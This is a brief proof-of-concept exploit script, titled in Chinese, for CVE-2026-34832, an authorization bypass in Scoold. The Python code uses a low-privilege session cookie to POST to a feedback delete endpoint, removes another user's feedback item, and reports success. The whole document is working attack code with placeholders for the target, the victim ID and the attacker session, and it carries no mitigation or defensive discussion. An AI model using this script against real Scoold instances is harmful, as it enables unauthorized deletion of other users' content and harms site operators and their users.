CVE-2026-34832 Scoold认证后授权缺陷

import requests def delete_feedback(target_url, feedback_id, session_cookie): """ PoC for CVE-2026-34832: Authenticated Authorization Bypass in Scoold This script attempts to delete a feedback item using a low-privilege user session. """ headers = { "Cookie": f"JSESSIONID={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } # Construct the delete endpoint URL delete_url = f"{target_url}/feedback/{feedback_id}/delete" try: response = requests.post(delete_url, headers=headers) if response.status_code == 200: print(f"[+] Successfully deleted feedback ID: {feedback_id}") print(f"[+] Response: {response.text}") else: print(f"[-] Failed to delete feedback. Status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Example usage TARGET = "http://localhost:8080" # Replace with actual Scoold instance URL VICTIM_FEEDBACK_ID = "12345" # Replace with target feedback ID ATTACKER_SESSION = "attacker_session_cookie_value" # Replace with low-privilege session delete_feedback(TARGET, VICTIM_FEEDBACK_ID, ATTACKER_SESSION)